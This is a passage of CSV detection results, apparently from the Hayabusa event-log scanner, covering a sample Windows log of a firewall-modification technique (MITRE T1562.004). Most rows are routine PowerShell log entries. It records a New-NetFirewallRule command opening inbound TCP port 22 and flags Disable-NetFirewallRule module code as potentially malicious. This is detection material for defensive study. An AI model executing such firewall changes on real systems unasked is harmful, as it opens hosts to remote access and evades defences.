},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.768 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.771 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.771 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.772 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.772 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.772 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.783 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.788 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.792 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.793 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.795 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.796 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,>,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.944 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.944 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule 
activation.evtx +2021-04-23 10:09:29.947 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.947 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.948 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.948 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.948 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo 
},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.949 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.950 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.954 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.954 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 
value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.957 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.958 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.958 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.958 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.959 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.976 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.980 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.985 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.994 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.998 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.999 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:30.001 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:30.043 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:30.044 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:30.046 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:43.608 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:43.609 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.641 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.641 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') 
